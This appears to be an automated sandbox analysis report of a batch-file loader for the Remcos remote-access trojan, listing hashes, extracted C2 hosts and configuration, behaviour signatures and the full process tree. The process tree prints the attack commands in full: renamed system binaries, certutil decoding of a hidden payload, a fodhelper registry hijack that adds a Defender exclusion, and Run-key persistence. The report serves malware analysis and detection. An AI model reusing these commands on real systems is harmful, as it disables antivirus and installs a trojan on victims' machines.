Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 10:31
Static task
static1
Behavioral task
behavioral1
Sample
f.cmd
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
f.cmd
Resource
win10v2004-20240508-en
General
-
Target
f.cmd
-
Size
4.7MB
-
MD5
c3a17194e3f679078eee9f539fe1d6f4
-
SHA1
64defa4bcca8298bc58f30fca4c0cfc561263465
-
SHA256
b9b8d30d6757b34902ef37849e61eba745f6c5bd476b41f1e993b86bf8099449
-
SHA512
169a2265c68654cb4b19898772c2ad35c758b4b5d65f2b25be71f724d379bc123fabc2b505cfedb1c09d3b79db8a291a9227988c5e1622631ea7b2cf5aa4efa4
-
SSDEEP
24576:CN3QGmU4n/+6JVT+avOgeF/ehZ2gRrxBJGhRCAQ:CFQGmdn/+GdRvOX9gRqQ
Malware Config
Extracted
remcos
RemoteHost
myumysmeetr.ddns.net:2404
mysweeterbk.ddns.net:2404
meetre1ms.freeddns.org:2404
bbhmeetre1ms.freeddns.org:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-TPT9X3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 24 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 2068 alpha.exe 2936 alpha.exe 2988 alpha.exe 1944 alpha.exe 3000 kn.exe 2976 alpha.exe 2108 alpha.exe 2724 alpha.exe 2668 alpha.exe 2648 xkn.exe 2520 alpha.exe 2536 ger.exe 2636 alpha.exe 2948 kn.exe 2356 alpha.exe 2804 Ping_c.pif 1652 alpha.exe 1988 alpha.exe 1824 alpha.exe 1772 alpha.exe 2008 alpha.exe 1720 alpha.exe 2252 alpha.exe 1440 alpha.exe -
Loads dropped DLL 13 IoCs
Processes:
cmd.exealpha.exealpha.exexkn.exealpha.exepid process 2428 cmd.exe 2428 cmd.exe 2428 cmd.exe 2428 cmd.exe 1944 alpha.exe 2428 cmd.exe 2428 cmd.exe 2428 cmd.exe 2428 cmd.exe 2668 alpha.exe 2648 xkn.exe 2648 xkn.exe 2520 alpha.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Ping_c.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Duchpovs = "C:\\Users\\Public\\Duchpovs.url" Ping_c.pif -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2228 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command ger.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Ping_c.pifpid process 2804 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exePing_c.pifpid process 2648 xkn.exe 2804 Ping_c.pif -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2648 xkn.exe Token: SeDebugPrivilege 2228 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 648 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 648 SndVol.exe 648 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2428 wrote to memory of 2420 2428 cmd.exe extrac32.exe PID 2428 wrote to memory of 2420 2428 cmd.exe extrac32.exe PID 2428 wrote to memory of 2420 2428 cmd.exe extrac32.exe PID 2428 wrote to memory of 2068 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2068 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2068 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2936 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2936 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2936 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2988 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2988 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2988 2428 cmd.exe alpha.exe PID 2988 wrote to memory of 2436 2988 alpha.exe extrac32.exe PID 2988 wrote to memory of 2436 2988 alpha.exe extrac32.exe PID 2988 wrote to memory of 2436 2988 alpha.exe extrac32.exe PID 2428 wrote to memory of 1944 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 1944 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 1944 2428 cmd.exe alpha.exe PID 1944 wrote to memory of 3000 1944 alpha.exe kn.exe PID 1944 wrote to memory of 3000 1944 alpha.exe kn.exe PID 1944 wrote to memory of 3000 1944 alpha.exe kn.exe PID 2428 wrote to memory of 2976 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2976 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2976 2428 cmd.exe alpha.exe PID 2976 wrote to memory of 1300 2976 alpha.exe extrac32.exe PID 2976 wrote to memory of 1300 2976 alpha.exe extrac32.exe PID 2976 wrote to memory of 1300 2976 alpha.exe extrac32.exe PID 2428 wrote to memory of 2108 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2108 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2108 2428 cmd.exe alpha.exe PID 2108 wrote to memory of 2664 2108 alpha.exe extrac32.exe PID 2108 wrote to memory of 2664 2108 alpha.exe extrac32.exe PID 2108 wrote to memory of 2664 2108 alpha.exe extrac32.exe PID 2428 wrote to memory of 2724 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2724 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2724 2428 cmd.exe alpha.exe PID 2724 wrote to memory of 2876 2724 alpha.exe extrac32.exe PID 2724 wrote to memory of 2876 2724 alpha.exe extrac32.exe PID 2724 wrote to memory of 2876 2724 alpha.exe extrac32.exe PID 2428 wrote to memory of 2668 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2668 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2668 2428 cmd.exe alpha.exe PID 2668 wrote to memory of 2648 2668 alpha.exe xkn.exe PID 2668 wrote to memory of 2648 2668 alpha.exe xkn.exe PID 2668 wrote to memory of 2648 2668 alpha.exe xkn.exe PID 2648 wrote to memory of 2520 2648 xkn.exe alpha.exe PID 2648 wrote to memory of 2520 2648 xkn.exe alpha.exe PID 2648 wrote to memory of 2520 2648 xkn.exe alpha.exe PID 2520 wrote to memory of 2536 2520 alpha.exe ger.exe PID 2520 wrote to memory of 2536 2520 alpha.exe ger.exe PID 2520 wrote to memory of 2536 2520 alpha.exe ger.exe PID 2428 wrote to memory of 2636 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2636 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2636 2428 cmd.exe alpha.exe PID 2636 wrote to memory of 2948 2636 alpha.exe kn.exe PID 2636 wrote to memory of 2948 2636 alpha.exe kn.exe PID 2636 wrote to memory of 2948 2636 alpha.exe kn.exe PID 2428 wrote to memory of 2356 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2356 2428 cmd.exe alpha.exe PID 2428 wrote to memory of 2356 2428 cmd.exe alpha.exe PID 2356 wrote to memory of 2228 2356 alpha.exe taskkill.exe PID 2356 wrote to memory of 2228 2356 alpha.exe taskkill.exe PID 2356 wrote to memory of 2228 2356 alpha.exe taskkill.exe PID 2428 wrote to memory of 2804 2428 cmd.exe Ping_c.pif
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\f.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\f.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\f.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Duchpovs.PIF3⤵
-
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.6MB
MD5daa25319da16998892f14c325b28ab32
SHA1f29d0a758e91aaf3180c580350addeadbdd692e7
SHA2562a995cd5579e377b2f9578ea86e12b5c4fa1ce2f49714e6be23148fec2076f99
SHA5127a9f395ea607057b5a31ea39b2b24c5b9d1b4ac73aba3c252434f3873576b5e426611e556d514c6727f646b9cb9d341f51778946e538f406ca4707077a00f2eb
-
C:\Users\Public\Ping_c.mp4Filesize
3.2MB
MD57fa93293418d2b9c0965fd53183d289b
SHA170f23a7e303d200baccaae4a46e250c86d18d54e
SHA2566a4c893b3cfe5327d54cbf953ad87d11614191476ebae92e2ac0559c1579f8ee
SHA512e18816dc44446a75402c0774e59a6306ef284d71da204970ab31e6795cf2dca16535f120ad65511c34eb959a6d710e4c8f50d174099ab4fa44ec7c37bffc4295
-
C:\Users\Public\ger.exeFilesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
\Users\Public\alpha.exeFilesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
\Users\Public\kn.exeFilesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
\Users\Public\xkn.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/648-95-0x000000001B5C0000-0x000000001B642000-memory.dmpFilesize
520KB
-
memory/648-96-0x000000001B5C0000-0x000000001B642000-memory.dmpFilesize
520KB
-
memory/648-92-0x000000001B5C0000-0x000000001B642000-memory.dmpFilesize
520KB
-
memory/648-90-0x0000000003030000-0x0000000004030000-memory.dmpFilesize
16.0MB
-
memory/648-97-0x000000001B5C0000-0x000000001B642000-memory.dmpFilesize
520KB
-
memory/2648-44-0x0000000000390000-0x0000000000398000-memory.dmpFilesize
32KB
-
memory/2648-43-0x000000001B550000-0x000000001B832000-memory.dmpFilesize
2.9MB
-
memory/2804-71-0x0000000000400000-0x00000000005A7000-memory.dmpFilesize
1.7MB